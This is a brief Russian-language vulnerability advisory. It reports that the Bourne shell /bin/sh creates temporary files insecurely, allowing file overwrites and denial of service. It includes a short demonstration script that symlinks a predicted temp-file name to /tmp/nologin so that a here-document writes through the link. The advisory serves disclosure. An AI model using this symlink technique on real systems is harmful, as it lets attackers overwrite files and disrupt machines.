Bourne Shell /bin/sh создает временные файлы абсолютно незащищенным способом. Это может быть использовано, чтобы перезаписать существующие файлы. Пока эта уязвимость может использоваться для DoS нападения, все еще остается открытым вопрос об использовании этого бага для получения дополнительных привилегий.
Демонстрация:
#!/bin/sh -x
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/sh$$0
cat <<EOF
Only root can create /etc/nologin.
Do any boot-time scripts use sh?
EOF
ls -l /tmp/nologin